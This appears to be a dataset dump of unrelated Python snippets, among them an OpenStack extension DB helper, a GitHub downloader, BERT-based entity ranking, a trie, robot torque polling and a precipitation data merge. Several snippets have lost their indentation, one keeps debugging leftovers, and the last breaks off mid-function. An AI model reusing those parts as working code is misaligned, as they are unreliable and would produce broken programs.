            self._set_if_not_none(attrs, cisco_apic.ALLOW_ROUTE_LEAK,
                                  row['allow_route_leak'])
        return attrs

    def set_network_extn_db(self, session, network_id, res_dict):
        """Create or update the extension row for a network."""
        row = (session.query(NetworkExtensionDb).filter_by(
            network_id=network_id).first())
        # Reuse the existing row if present, otherwise start a fresh one.
        row = row or NetworkExtensionDb(network_id=network_id)
        if cisco_apic.ALLOW_ROUTE_LEAK in res_dict:
            row['allow_route_leak'] = res_dict[cisco_apic.ALLOW_ROUTE_LEAK]
        session.add(row)

    def get_router_extn_db(self, session, router_id):
        """Return the extension attribute dict stored for a router."""
        row = (session.query(RouterExtensionDb).filter_by(
            router_id=router_id).first())
        attrs = {}
        if row:
            self._set_if_not_none(attrs, cisco_apic_l3.USE_ROUTING_CONTEXT,
                                  row['use_routing_context'])
        return attrs

    def set_router_extn_db(self, session, router_id, res_dict):
        """Store a router's routing-context reference, if one was supplied."""
        if res_dict.get(cisco_apic_l3.USE_ROUTING_CONTEXT):
            row = RouterExtensionDb(router_id=router_id)
            row['use_routing_context'] = res_dict[
                cisco_apic_l3.USE_ROUTING_CONTEXT]
            session.add(row)
| StarcoderdataPython |
##==============================================================#
## SECTION: Imports #
##==============================================================#
import io
import sys
import os.path as op
import auxly.filesys as fsys
import qprompt
import requests
##==============================================================#
## SECTION: Setup #
##==============================================================#
# Handle Python 2/3 differences.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding("utf-8")
from urllib import unquote
else:
from urllib.parse import unquote
##==============================================================#
## SECTION: Global Definitions #
##==============================================================#
GHAPI = "https://api.github.com/repos/"
GHURL = "https://github.com/"
GHRAW = "https://raw.githubusercontent.com/"
##==============================================================#
## SECTION: Function Definitions #
##==============================================================#
def is_github(src):
    """Return True if *src* points at GitHub (API, web UI, or raw host).

    ``str.startswith`` accepts a tuple of prefixes, so a single call
    replaces the original three-branch check.
    """
    return src.startswith((GHAPI, GHURL, GHRAW))
def prep_url(url):
    """Preps the given URL and returns either an API URL (for directories) or a
    raw content URL (for files).

    Returns a ``(url, name)`` pair where *name* is the file or repo
    component used as the default download target.  Non-GitHub-UI URLs
    (already API or raw URLs) pass through unchanged.
    """
    if url.startswith(GHURL):
        # Path tokens after the host: [owner, repo, blob|tree, ref, path...]
        tok = url.split("/")[3:]
        if len(tok) > 4:
            name = tok[-1]   # deep link: last path segment
        else:
            name = tok[1]    # bare repo link: repo name
        # Bare "owner/repo" links default to the master tree.
        if 2 == len(tok):
            tok.append("tree")
        if 3 == len(tok):
            tok.append("master")
        if "blob" == tok[2]:
            # File link -> raw content host.
            url = GHRAW
            url += "{0}/{1}/{3}/".format(*tok)
            url += "/".join(tok[4:])
        elif "tree" == tok[2]:
            # Directory link -> contents API with the ref as a query arg.
            url = GHAPI
            url += "{0}/{1}/contents/".format(*tok)
            url += "/".join(tok[4:])
            url += "?ref=" + tok[3]
    else:
        tok = url.split("/")
        name = tok[-1]
    return url,name
def is_file(url):
    """Return the unquoted filename when *url* resolves to a file,
    otherwise None (directories resolve to the API host instead)."""
    prepped, name = prep_url(url)
    return unquote(name) if prepped.startswith(GHRAW) else None
def is_dir(url):
    """Return the unquoted directory name when *url* is not a file,
    otherwise None."""
    if not is_file(url):
        return unquote(url.split("/")[-1])
    return None
def download(srcurl, dstpath=None):
    """Handles downloading files/dirs from the given GitHub repo URL to the
    given destination path.

    When *dstpath* is omitted the file/dir name derived from the URL is
    used, relative to the current directory.  Directories are walked
    recursively through the GitHub contents API; files are fetched from
    the raw host.
    """
    def download_api(srcurl, dstdir):
        # Recursively mirror a directory listing returned by the API.
        items = requests.get(srcurl).json()
        if op.isfile(dstdir):
            raise Exception("DestDirIsFile")
        fsys.makedirs(dstdir, ignore_extsep=True)
        # An error response is a dict with a "message" key, not a list.
        if isinstance(items, dict) and "message" in items.keys():
            qprompt.error(items['message'])
            return
        for item in items:
            if "file" == item['type']:
                fpath = op.join(dstdir, item['name'])
                with io.open(fpath, "w", encoding="utf-8") as fo:
                    text = requests.get(item['download_url']).text
                    fo.write(text)
            else:
                # Subdirectory: recurse using the item's own API URL.
                download_api(item['url'], op.join(dstdir, item['name']))
    def download_raw(srcurl, dstfile):
        # Fetch a single file from the raw host.
        fsys.makedirs(dstfile)
        if op.isdir(dstfile):
            # Destination is a directory: keep the source filename.
            dstfile = op.join(dstfile, srcurl.split("/")[-1])
        dstfile = unquote(dstfile)
        with io.open(dstfile, "w") as fo:
            fo.write(requests.get(srcurl).text)
    url,name = prep_url(srcurl)
    if not dstpath:
        dstpath = op.join(op.abspath("."), name)
    dstpath = op.abspath(dstpath)
    # API URL means directory; anything else is a raw file URL.
    if url.startswith(GHAPI):
        download_api(url, dstpath)
    else:
        download_raw(url, dstpath)
##==============================================================#
## SECTION: Main Body #
##==============================================================#
if __name__ == '__main__':
pass
| StarcoderdataPython |
3381338 | <reponame>PythonDataIntegrator/pythondataintegrator
from injector import inject
from sqlalchemy import func
from sqlalchemy.orm import Query
from domain.common.specifications.OrderBySpecification import OrderBySpecification
from infrastructure.data.RepositoryProvider import RepositoryProvider
from infrastructure.dependency.scopes import IScoped
from domain.operation.GetDataOperationJobExecutionIntegrationList.GetDataOperationJobExecutionIntegrationListQuery import \
GetDataOperationJobExecutionIntegrationListQuery
from models.dao.common import Status
from models.dao.connection import Connection
from models.dao.integration import DataIntegrationConnection, DataIntegration
from models.dao.operation import DataOperationIntegration, DataOperationJobExecutionIntegration, \
DataOperationJobExecutionIntegrationEvent
class GetDataOperationJobExecutionIntegrationListSpecifications(IScoped):
    """Builds the query listing all integrations of one data-operation job
    execution, enriched with source/target connection names and the total
    affected-row count summed over the integration's events."""

    @inject
    def __init__(self,
                 repository_provider: RepositoryProvider,
                 ):
        self.repository_provider = repository_provider

    def __specified_query(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
        """Assemble the base query filtered to ``query.request.ExecutionId``,
        ordered by the integration's configured order."""
        # Subquery: per execution-integration id, the summed AffectedRowCount
        # over all of its events (0 when there are none).
        total_affected_row_query = self.repository_provider.query(
            DataOperationJobExecutionIntegration.Id,
            func.coalesce(func.sum(DataOperationJobExecutionIntegrationEvent.AffectedRowCount), 0).label(
                "AffectedRowCount")) \
            .join(DataOperationJobExecutionIntegration.DataOperationJobExecutionIntegrationEvents).group_by(
            DataOperationJobExecutionIntegration.Id)
        total_affected_row_subquery = total_affected_row_query.subquery()
        # Subquery: source-side connection name (SourceOrTarget == 0).
        source_connection_query = self.repository_provider.query(
            DataIntegrationConnection,
            DataIntegrationConnection.DataIntegrationId,
            Connection.Name.label(
                "ConnectionName")
        ) \
            .join(Connection, DataIntegrationConnection.ConnectionId == Connection.Id) \
            .filter(DataIntegrationConnection.IsDeleted == 0) \
            .filter(DataIntegrationConnection.SourceOrTarget == 0)
        source_connection_subquery = source_connection_query.subquery()
        # Subquery: target-side connection name (SourceOrTarget == 1).
        target_connection_query = self.repository_provider.query(
            DataIntegrationConnection,
            DataIntegrationConnection.DataIntegrationId,
            Connection.Name.label(
                "ConnectionName")
        ) \
            .join(Connection, DataIntegrationConnection.ConnectionId == Connection.Id) \
            .filter(DataIntegrationConnection.IsDeleted == 0) \
            .filter(DataIntegrationConnection.SourceOrTarget == 1)
        target_connection_subquery = target_connection_query.subquery()
        # Main query: outer joins keep integrations that lack connections
        # or events.
        specified_query = self.repository_provider.query(
            DataOperationJobExecutionIntegration,
            DataOperationIntegration,
            source_connection_subquery.c.ConnectionName.label("SourceConnectionName"),
            target_connection_subquery.c.ConnectionName.label("TargetConnectionName"),
            total_affected_row_subquery.c.AffectedRowCount.label("AffectedRowCount")
        ) \
            .join(DataOperationIntegration, isouter=True) \
            .join(DataIntegration, isouter=True) \
            .join(Status, isouter=True) \
            .join(source_connection_subquery,
                  source_connection_subquery.c.DataIntegrationId == DataIntegration.Id, isouter=True) \
            .join(target_connection_subquery,
                  target_connection_subquery.c.DataIntegrationId == DataIntegration.Id, isouter=True) \
            .join(total_affected_row_subquery,
                  total_affected_row_subquery.c.Id == DataOperationJobExecutionIntegration.Id, isouter=True)
        specified_query = specified_query.filter(
            DataOperationJobExecutionIntegration.DataOperationJobExecutionId == query.request.ExecutionId) \
            .order_by(DataOperationIntegration.Order)
        return specified_query

    def specify(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
        """Return the full result query for *query*."""
        data_query = self.__specified_query(query=query)
        return data_query

    def count(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
        """Return the number of rows the result query would yield."""
        return self.__specified_query(query=query).count()
| StarcoderdataPython |
3240533 | <filename>code/sentence_embedding_with_bert_ranking.py
'''
Rank the entities based on the sentence similary
Steps
1. Load sentence embedding first >> DONE
2. Read the settings file and process it >> DONE
3. Do embedding of question q >> TRIVIAL
4. Do embedding of sentences containing the entities >> WIP
5. Do coreference resolution
6. Save the file >> TRIVIAL
'''
'''
Step 1: Load sentence embeddings
'''
# import basic libraries
from random import randint
import numpy as np
import torch
import scipy
import json
import unicodedata
def remove_accented_chars(text):
    """Strip accents from *text*: decompose to NFKD, then drop every
    non-ASCII code point (the combining marks)."""
    decomposed = unicodedata.normalize('NFKD', text)
    return decomposed.encode('ascii', 'ignore').decode('utf-8', 'ignore')
# Load the pre-trained sentence-embedding model (BERT fine-tuned on NLI
# with mean pooling over token embeddings); downloads on first use.
from sentence_transformers import SentenceTransformer
model = SentenceTransformer('bert-base-nli-mean-tokens')
def cosine(u, v):
    """Cosine similarity between vectors *u* and *v* (1.0 = parallel)."""
    denominator = np.linalg.norm(u) * np.linalg.norm(v)
    return np.dot(u, v) / denominator
# Sanity check: two near-paraphrases should score close to 1.0.
print(cosine(model.encode(['the cat eats.'])[0], model.encode(['the cat drinks.'])[0]))
"""
Read the entities and settings file
"""
import yaml
config_file_name = 'configure.yml'
# defined it here too
with open(config_file_name) as config_file:
config_file_values = yaml.load(config_file)
# Get Entitites for each question
qid = config_file_values["qid"]
quesType = config_file_values["quesType"]
quesPathStart = config_file_values["quesPathStart"]
corpusPathStart = config_file_values["copusPathStart"]
resultPathStart = config_file_values["resultPathStart"]
samplingType = config_file_values["samplingType"]
from extract_entities import get_named_entities, get_named_entities_with_sentence
from pprint import pprint
from common import get_corpus_path, get_question_and_gold_answer
import pickle
import json
import sys
import en_core_web_sm
nlp = en_core_web_sm.load()
nlp.max_length = 1030000
# Get Question type from dump file
map_qid_qtype_pair = {}
input_file_name = "results/quesType_finetune_" + quesType
with open(input_file_name, 'r') as input_file:
lines = input_file.readlines()
for line in lines:
question_id = line.split("\t")[0]
spacy_tag_ques_type = line.split("\t")[2]
map_qid_qtype_pair[question_id] = spacy_tag_ques_type
#print(map_qid_qtype_pair)
# result file map for qid and top ranked entities
result_file_qid_answers = {}
# Main loop: for each question, extract candidate entities, filter them by
# the question's expected answer type, score them by BERT sentence
# similarity weighted with document frequency, and keep the top groups.
# NOTE(review): `i` is overwritten with 121 on every pass and the loop body
# ends with an unconditional `break`, so only one question is processed per
# run -- debugging leftovers; confirm before re-enabling the full range.
for i in range(150):
    i = 121
    ques_id = int(qid) + i
    question, answer, ques_exact_id = get_question_and_gold_answer( ques_id, quesType, quesPathStart)
    #if i == 121:
    #    continue
    # hack: ques_id looks like cqw-150-q001, corpus id 001, extract from this
    corpus_ques_id = ques_exact_id.split('-')[2][1:]
    print(corpus_ques_id)
    corpus_path = get_corpus_path(corpus_ques_id, quesType, corpusPathStart, samplingType)
    #tags = get_named_entities(ques_id, quesType, quesPathStart, corpus_path)
    tags, ent_sentence_map = get_named_entities_with_sentence(ques_id, quesType, quesPathStart, corpus_path)
    #pprint(tags)
    # convert the tags into list (ordered way), most frequent entity first
    tags_list = sorted(tags.items(), key=lambda pair: pair[1], reverse=True)
    # Dead code kept as a string literal: dump of all named entities.
    """
    output_file_name = "results/all_named_entities_" + quesType
    question, answer, ques_exact_id = get_question_and_gold_answer( ques_id, quesType, quesPathStart)
    with open( output_file_name , 'a+') as output:
        output.write(question + "\t" + ques_exact_id + "\n")
        output.write("Gold Answer : "+ " | ".join(answer) + "\n")
        output.write(" \n ".join(map(str, tags_list)))
        output.write("\n")
    """
    # Filter questions based on type
    spacy_tags_ques_type_list = map_qid_qtype_pair[ques_exact_id].split(" | ")
    #filtered_tag_list = [tag_items for tag_items in tags_list if tags_list[0] in spacy_tags_ques_type_list]
    # filter the tags based on the question type tag
    filtered_tag_list = []
    for tag_items in tags_list:
        ent, tag = tag_items[0]
        if(tag in spacy_tags_ques_type_list):
            filtered_tag_list.append(tag_items)
    # Dead code kept as a string literal: dump of the filtered entities.
    """
    output_file_name = "results/filtered_named_entities_" + quesType
    with open( output_file_name , 'a+') as output:
        output.write(question + "\t" + ques_exact_id + "\n")
        output.write("Gold Answer : "+ " | ".join(answer) + "\n")
        output.write(" \n ".join(map(str, filtered_tag_list)))
        output.write("\n")
    #print(filtered_tag_list)
    """
    #print("Filtered Tag List : ")
    #print(filtered_tag_list)
    doc_content = []
    # Old Code extracting sentences
    """
    for tag_items in filtered_tag_list:
        ent, tag = tag_items[0]
        max_cosine_value = -1
        sentences = []
        str_sent = ""
        #print(doc_content[i])
        for i in range(0, 10):
            sentences += get_sentence_from_entity((doc_content[i]), (ent), tag)
        #print(sentences)
        for sentence in sentences:
            #print(sentence)
            #print(sentence , cosine(model.encode([str.lower(question)])[0], model.encode([str(sentence)])[0]))
            cosine_value = cosine(model.encode([str.lower(question)])[0], model.encode([str(sentence)])[0])
            if cosine_value > max_cosine_value :
                max_cosine_value = cosine_value
                str_sent = str(sentence)
        print(str_sent, max_cosine_value, ent, tag)
    """
    # Score each candidate entity: best cosine similarity between the
    # question and any sentence mentioning the entity, weighted by the
    # entity's document frequency.
    result_list = []
    # run for top k filtered tag list
    topK_cut_off = 100
    tag_count = 0
    emb_len = 768
    for tag_items in filtered_tag_list:
        tuple_val = tag_items[0]
        max_cosine_value = -1
        str_sent = ""
        #print(ent_sentence_map[tuple_val])
        sentence_list = ent_sentence_map[tuple_val]
        #for sentence in sentence_list:
        #print(sentence_list)
        #print("Sentence len: ", len(sentence_list))
        sentence_embeddings = model.encode(sentence_list)
        #print("sent emb len", len(sentence_embeddings))
        #print("Sentence Shape : ", sentence_embeddings[0].shape)
        ques_embedding = model.encode(question)
        #print("Ques shape: ", ques_embedding[0].shape)
        #print(len(ques_embedding))
        #sys.exit(1)
        """
        for sentence, embedding in zip(sentence_list, sentence_embeddings):
            print("Sentence:", sentence)
            print("Embedding:", embedding)
            print("")
        """
        #print(ques_embedding.shape)
        sentence_embeddings = np.stack(sentence_embeddings, axis = 0)
        #print(type(sentence_embeddings))
        #print(sentence_embeddings.shape)
        ques_embedding = ques_embedding[0].reshape(emb_len, 1).transpose()
        #print("Ques shape: ", ques_embedding[0].shape)
        #print(sentence_embeddings.shape)
        #print(ques_embedding.shape)
        # cdist returns cosine *distance*; similarity is 1 - distance.
        cosine_value = scipy.spatial.distance.cdist(ques_embedding, sentence_embeddings, "cosine")
        cosine_sim = 1 - cosine_value
        #print(cosine_sim)
        max_cosine_value = cosine_sim.max()
        #cosine_value = cosine(model.encode([str.lower(question)])[0], model.encode([str.lower(sentence)])[0])
        #if cosine_value > max_cosine_value :
        #    max_cosine_value = cosine_value
        #    str_sent = str(sentence)
        #max_cosine_value = 1
        #sys.exit(1)
        if max_cosine_value != -1 :
            doc_freq = tag_items[1]
            doc_number = 10
            score_tag_tuple = ((doc_freq / doc_number)* max_cosine_value,tuple_val)
            result_list.append(score_tag_tuple)
        #print(str_sent, max_cosine_value, tuple_val) # print the max score of sentence and tuples
        tag_count += 1
        if tag_count >= topK_cut_off: # run for top k entities, change topk_cut_off if we want to include more
            break
    result_list = sorted(result_list, key=lambda x: x[0], reverse = True) # sort the list based on cosine values
    #exit(1)
    # Group equally-scored entities together; keep at most the 5 best
    # score groups, each joined with " | ".
    rank_map = {}
    top_scored_result = []
    temp = []
    for tag_items in result_list:
        value = tag_items[0]
        if value not in rank_map:
            rank_map[value] = 1
            if len(temp) != 0:
                top_scored_result.append(" | ".join(temp))
                temp.clear()
            if len(rank_map) >5:
                break
        ent, tag = tag_items[1]
        temp.append(str(ent))
    result_file_qid_answers[ques_exact_id] = top_scored_result
    #print((result_file_qid_answers))
    #exit(1)
    if i %10 == 0:
        print("Processed %d queries" % i)
    # Dead code kept as a string literal: earlier frequency-only ranking.
    """
    top_scored_result = []
    rank = 1
    rank_map = {}
    temp = []
    for tag_items in filtered_tag_list:
        value = tag_items[1]
        #print(value)
        #exit(1)
        if value not in rank_map :
            rank_map[value] = 1
            if len(temp)!= 0 :
                top_scored_result.append(" | ".join(temp))
                temp.clear()
            if len(rank_map) > 5 :
                break
        ent, tag = tag_items[0]
        temp.append(str.lower(ent))
    result_file_qid_answers[ques_exact_id] = top_scored_result
    #print(len(result_file_qid_answers))
    #exit(1)
    # get the only top scored named entities
    """
    break
# Remaining entities rank them based on some order
json_object = json.dumps(result_file_qid_answers, indent = 4)
with open(resultPathStart + samplingType + "_part_" + quesType + ".json" , "w+") as outfile:
    outfile.write(json_object)
# TODO : incorporate context while ranking
3354613 | # Modifications Copyright 2022 Tau
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
class GlobalAveragePooling(nn.Module):
    """Global Average Pooling neck.

    Pools each feature map to *output_size* and flattens it to
    ``(N, C * H_out * W_out)``.  ``view`` is used instead of ``squeeze``
    so a batch of size 1 keeps its batch dimension.
    """

    def __init__(self, output_size=(1, 1)):
        super().__init__()
        # Adaptive pooling accepts arbitrary input spatial sizes.
        self.gap = nn.AdaptiveAvgPool2d(output_size)

    def init_weights(self):
        # The neck has no learnable parameters; nothing to initialize.
        pass

    def forward(self, inputs):
        """Pool a single tensor, or each tensor in a tuple/list, and
        flatten all but the batch dimension."""
        def _pool(x):
            return self.gap(x).view(x.size(0), -1)

        if isinstance(inputs, tuple):
            return tuple(_pool(x) for x in inputs)
        if isinstance(inputs, list):
            return [_pool(x) for x in inputs]
        if isinstance(inputs, torch.Tensor):
            return _pool(inputs)
        raise TypeError('neck inputs should be tuple or torch.tensor')
3260283 | <filename>Implement Trie (Prefix Tree).py
class TrieNode:
    """One node of the trie: child links keyed by character plus a flag
    marking whether a stored word ends at this node."""
    def __init__(self):
        self.next = {}  # char -> TrieNode child
        self.isWord = False  # True when an inserted word ends here
class Trie:
    """Prefix tree supporting insert, exact-word search, and prefix tests."""

    def __init__(self):
        self.root = TrieNode()

    def insert(self, word):
        """Add *word* to the trie, creating nodes as needed."""
        node = self.root
        for ch in word:
            node = node.next.setdefault(ch, TrieNode())
        node.isWord = True

    def _walk(self, chars):
        """Follow *chars* from the root; return the final node or None
        when the path leaves the trie."""
        node = self.root
        for ch in chars:
            node = node.next.get(ch)
            if node is None:
                return None
        return node

    def search(self, word):
        """Return True iff *word* was inserted exactly."""
        node = self._walk(word)
        return node is not None and node.isWord

    def startsWith(self, prefix):
        """Return True iff some inserted word starts with *prefix*."""
        return self._walk(prefix) is not None
if __name__ == '__main__':
    # Quick self-check mirroring the classic LeetCode 208 example.
    trie = Trie()
    trie.insert('apple')
    print(trie.search('apple')) # True
    print(trie.search('app')) # False
    print(trie.startsWith('app')) # True
    trie.insert('app')
    print(trie.search('app')) # True
from sunrisePy import sunrisePy
import time
import numpy as np

# Connect to the KUKA iiwa controller at this address.
ip='172.31.1.148'
# ip='localhost'
iiwa=sunrisePy(ip)
# Blink the blue status light for two seconds to confirm the connection.
iiwa.setBlueOn()
time.sleep(2)
iiwa.setBlueOff()
try:
    # Poll the measured joint torques at ~5 Hz until interrupted.
    while True:
        print(iiwa.getJointsMeasuredTorques())
        time.sleep(0.2)
except KeyboardInterrupt:
    # Close the connection cleanly, then re-raise so the interrupt is
    # still visible to the caller.
    iiwa.close()
    print('an error happened')
    raise
1776496 | <filename>demo/scripts/shot.py
#!/usr/bin/env python
"""
Recreate tcl script in python
'scripts/shot.tcl'
==============
set verify
set tree demo
set current demo 0
set current demo /increment
create pulse 0
set tree demo /shot=0
dispatch /build /monitor=MONITOR
dispatch /phase init /monitor=MONITOR
"""
import MDSplus as mds
# set verify
| StarcoderdataPython |
1610090 | <gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from netCDF4 import Dataset, num2date
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import cartopy.crs as crs
from wrf import getvar, get_cartopy, latlon_coords, to_np, cartopy_xlim, cartopy_ylim
import pprint
import pandas as pd
import os
from datetime import datetime
import seaborn as sns
import dataframe_image as dfi
from geopy.distance import geodesic
from scipy.spatial.distance import cdist, pdist
# #### Función que genera un dataframe a partir de la lectura de un archivo de la NASA
# In[2]:
def get_nasa_dataframe(dataset, idx):
    """Flatten one daily IMERG NetCDF file into (lon, lat, metrics) rows
    and return the single row at positional index *idx*.

    Parameters
    ----------
    dataset : netCDF4.Dataset
        An open IMERG daily file.
    idx : int
        Positional index into the flattened (lon, lat) grid; callers use
        it to select the grid cell of a specific city.

    Returns
    -------
    pandas.Series
        The row at *idx* with the date, coordinates and precipitation
        metrics.
    """
    lats = dataset.variables["lat"][:]
    lons = dataset.variables["lon"][:]
    time = dataset.variables["time"]
    times = num2date(time[:], time.units)
    time_of_data = times[0].strftime("%Y-%m-%d")
    # BUG FIX: these reads used the global `f1` instead of the `dataset`
    # argument, so the function only worked because the caller happened
    # to name its open file `f1`.
    prcpCal = dataset.variables["precipitationCal"]
    prcpCal_cnt = dataset.variables["precipitationCal_cnt"]
    prcpCal_cnt_cond = dataset.variables["precipitationCal_cnt_cond"]
    HQprcp = dataset.variables["HQprecipitation"]
    HQprcp_cnt = dataset.variables["HQprecipitation_cnt"]
    HQprcp_cnt_cond = dataset.variables["HQprecipitation_cnt_cond"]
    ds = xr.Dataset(
        {
            "date": time_of_data,
            "prcpCal": (("lon", "lat"), prcpCal[0, :, :]),
            "prcpCal_cnt": (("lon", "lat"), prcpCal_cnt[0, :, :]),
            "prcpCal_cnt_cond": (("lon", "lat"), prcpCal_cnt_cond[0, :, :]),
            # BUG FIX: "HQprcp_cnt" was filled from HQprcp_cnt_cond
            # (copy-paste error); it now uses the HQprcp_cnt variable.
            "HQprcp": (("lon", "lat"), HQprcp[0, :, :]),
            "HQprcp_cnt": (("lon", "lat"), HQprcp_cnt[0, :, :]),
            "HQprcp_cnt_cond": (("lon", "lat"), HQprcp_cnt_cond[0, :, :]),
        },
        {
            "lon": lons,
            "lat": lats,
        },
    )
    df = ds.to_dataframe()
    dataframe = df.reset_index()[:]
    return dataframe.iloc[idx]
# #### Función que regresa un dataframe solo con la información de precipitación, ciudad y fecha
# In[3]:
def get_prometeus_dataframe(filename, df, city):
    """Return a one-row DataFrame with the daily precipitation total for
    *city* on the date encoded in *filename*.

    The date is the first 8 characters of *filename* (YYYYMMDD).  Only
    rows with ``dominio == "d01"`` for *city* on that date are summed.
    Note: *df*'s "datetime" column is normalized in place to
    YYYY-MM-DD strings.
    """
    date = datetime.strptime(filename[:8], "%Y%m%d").strftime("%Y-%m-%d")
    # Normalize the timestamp column to plain date strings (in place).
    df["datetime"] = pd.to_datetime(df["datetime"])
    df["datetime"] = df["datetime"].dt.strftime("%Y-%m-%d")
    mask = ((df["dominio"] == "d01")
            & (df["ciudad"] == city)
            & (df["datetime"] == date))
    total = df.loc[mask, "precipitacion"].sum()
    return pd.DataFrame({
        "date": [date],
        "city": [city],
        "precipitation": [total],
    })
# #### En este paso abrimos todos los archivos de la NASA que previamente descargamos, ademas mandamos extraer solo la información de ciertas ciudades. Todos los archivos tiene el prefix NASA GES_DISC GPM_L3 v06 IMERG_Final
# In[4]:
path = "nasa/"
df_nasa = pd.DataFrame()
dfn_hmo = pd.DataFrame()
dfn_nog = pd.DataFrame()
dfn_obr = pd.DataFrame()
for ncfile in os.listdir(path):
if ncfile.endswith(".nc4"):
f1 = Dataset(path + ncfile)
dfn_hmo = dfn_hmo.append(get_nasa_dataframe(f1, 7950), ignore_index=True)
dfn_nog = dfn_nog.append(get_nasa_dataframe(f1, 5656), ignore_index=True)
dfn_obr = dfn_obr.append(get_nasa_dataframe(f1, 10336), ignore_index=True)
f1.close()
dfn_hmo = dfn_hmo.sort_values(by="date").reset_index(drop=True)
dfn_nog = dfn_nog.sort_values(by="date").reset_index(drop=True)
dfn_obr = dfn_obr.sort_values(by="date").reset_index(drop=True)
# #### Revisamos que todo se haya generado bien
# In[5]:
#Hermosillo
dfn_hmo.head()
# In[6]:
#Heroica Nogales
dfn_nog.head()
# In[7]:
#Ciudad Obregon
dfn_obr.head()
# #### En este paso abrimos todos los archivos de PROMETEUS que previamente descargamos, ademas mandamos extraer solo la información de ciertas ciudades. Todos los archivos tiene el prefix fecha+_dataset.csv
# In[8]:
path = "prometeus/"
dfp_nog = pd.DataFrame()
dfp_hmo = pd.DataFrame()
dfp_obr = pd.DataFrame()
for file in os.listdir(path):
if file.endswith(".csv"):
f1 = pd.read_csv(path + file)
dfp_nog = dfp_nog.append(get_prometeus_dataframe(file, f1, "Heroica Nogales"), ignore_index=True)
dfp_hmo = dfp_hmo.append(get_prometeus_dataframe(file, f1, "Hermosillo"), ignore_index=True)
dfp_obr = dfp_obr.append(get_prometeus_dataframe(file, f1, "Ciudad Obregón"), ignore_index=True)
dfp_nog = dfp_nog.sort_values(by=["date"]).reset_index(drop=True)
dfp_hmo = dfp_hmo.sort_values(by=["date"]).reset_index(drop=True)
dfp_obr = dfp_obr.sort_values(by=["date"]).reset_index(drop=True)
# #### Revisamos que todo se haya generado bien
# In[9]:
#Heroica Nogales
dfp_nog.head()
# In[10]:
#Hermosillo
dfp_hmo.head()
# In[11]:
#Ciudad Obregón
dfp_obr.head()
# #### Unimos los dataframes de NASA y PROMETEUS para cada ciudad
# In[12]:
# Join NASA and PROMETEUS data per city on the date; left join keeps
# every NASA day even when PROMETEUS data is missing.
adata_hmo = dfn_hmo.merge(dfp_hmo, on=["date"], how="left")
adata_nog = dfn_nog.merge(dfp_nog, on=["date"], how="left")
adata_obr = dfn_obr.merge(dfp_obr, on=["date"], how="left")
# #### Check that the merges were generated correctly
# In[13]:
# Hermosillo (head() is a notebook leftover; no effect in a script)
adata_hmo.head()
# In[14]:
# Heroica Nogales
adata_nog.head()
# In[15]:
# Ciudad Obregon
adata_obr.head()
# #### Unimos los 3 dataframes
# In[27]:
# Combine the three city frames into one wide table keyed on date; the
# suffixes disambiguate the overlapping column names per city.
adata_merged = pd.merge(adata_hmo, adata_nog, on="date", suffixes=("_hmo","_nog"))
adata = pd.merge(adata_merged, adata_obr, on="date")
# #### Check that all data is present
# In[28]:
adata.info()
# #### Por último generamos el archvo tidy_data.csv y el diccionario de datos para trabajar con ellos mas adelante
# In[29]:
# Rename the columns so every city follows the same naming scheme
# (Obregon lost its suffix in the final merge).
adata.rename(columns = {"city": "city_obr",
                        'HQprcp': 'HQprcp_obr',
                        "precipitation": "prcp_obr",
                        "precipitation_hmo": "prcp_hmo",
                        "precipitation_nog": "prcp_nog"},
             inplace = True)
# Keep only the columns of interest.
sel_adata = adata[["date","city_hmo","city_nog","city_obr",
                   "HQprcp_hmo","HQprcp_nog","HQprcp_obr",
                   "prcp_hmo","prcp_nog","prcp_obr"]]
# Save the tidy dataset as CSV for later analysis.
sel_adata.to_csv("datos_tidy.csv", index=False)
# In[35]:
#Diccionario de Datos
columna = [
"date",
"city_hmo",
"city_nog",
"city_obr",
"HQprcp_hmo",
"HQprcp_nog",
"HQprcp_obr",
"prcp_hmo",
"prcp_nog",
"prcp_obr",
]
descripcion = [
"Fecha de pronóstico YYYY-mm-dd",
"Ciudad de Hermosillo",
"Ciudad de Nogales",
"Ciudad de Obregón",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Hermosillo",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Nogales",
"Pronóstico de precipitación acumulada 24hrs de la NASA para Ciudad Obregón",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Hermosillo",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Nogales",
"Pronóstico de precipitación acumulada 24hrs de PROMETEUS para Ciudad Obregón",
]
data = pd.DataFrame({"Columna": columna, "Descripción": descripcion})
data.to_csv("diccionario_datos.csv", index=False)
# In[ ]:
| StarcoderdataPython |
1684997 | #!/usr/bin/env python
from collections import defaultdict
import itertools
def manhattan(a, b=None):
    """Return the Manhattan (L1) distance between points *a* and *b*.

    When *b* is omitted the distance is measured from the origin.  The
    original default of a module-level ``itertools.repeat(0)`` iterator
    was shared across calls (it only worked because ``repeat`` is
    infinite); a ``None`` sentinel is safe and clearer.  The comprehension
    also no longer shadows the parameters ``a`` and ``b``.
    """
    if b is None:
        b = itertools.repeat(0)
    return sum(abs(x - y) for x, y in zip(a, b))
def solve(input):
    """Print the Manhattan distance from the origin to the closest point
    where the two wires cross (Advent of Code 2019 day 3, part 1).

    *input* is a pair of comma-separated path strings, e.g.
    ``("R8,U5,L5,D3", "U7,R6,D4,L4")``.
    """
    # direction letter -> (unit step, drawing character)
    directions = {'L': ((-1, 0), '-'), 'R': ((1, 0), '-'),
                  'U': ((0, 1), '|'), 'D': ((0, -1), '|')}
    wire1, wire2 = input
    grid = defaultdict(lambda: '.')

    # Lay down the first wire.
    pos = (0, 0)
    for step in wire1.split(','):
        (dx, dy), char = directions[step[0]]
        for _ in range(int(step[1:]) - 1):
            pos = (pos[0] + dx, pos[1] + dy)
            grid[pos] = char
        pos = (pos[0] + dx, pos[1] + dy)
        grid[pos] = '+'  # segment corner

    # Trace the second wire, marking crossings with 'X'.
    pos = (0, 0)
    for step in wire2.split(','):
        (dx, dy), char = directions[step[0]]
        for _ in range(int(step[1:]) - 1):
            pos = (pos[0] + dx, pos[1] + dy)
